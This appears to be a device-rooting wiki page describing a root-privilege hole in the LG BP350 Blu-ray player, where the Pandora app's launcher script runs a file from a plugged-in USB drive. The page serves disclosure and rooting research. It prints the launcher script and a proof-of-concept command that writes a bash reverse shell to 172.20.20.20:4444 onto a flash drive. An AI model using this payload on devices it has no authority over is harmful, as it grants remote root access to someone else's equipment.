LG BP350
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
LG BP350
"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the LG BP350 Blu-ray Player at Amazon
App Launcher Script Hijack
The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.
cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh #!/bin/sh # echo "Enter pandora.sh" echo "Call pandorastub" $PWD export QT_QWS_FONTDIR=/usr/share/font echo "pandora font path = " $QT_QWS_FONTDIR export QT_PLUGIN_PATH=/plugins echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH" if [ -e /mnt/sda1/PandoraApp ]; then echo "/mnt/sda1/PandoraApp -qws -display directfb" /mnt/sda1/PandoraApp -qws -display directfb elif [ -e /mnt/sdb1/PandoraApp ]; then echo "/mnt/sdb1/PandoraApp -qws -display directfb" /mnt/sdb1/PandoraApp -qws -display directfb else echo "pandora not for vosd" echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb" /usr/local/bin/pandora/PandoraApp -qws -display directfb fi
POC
The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.
printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp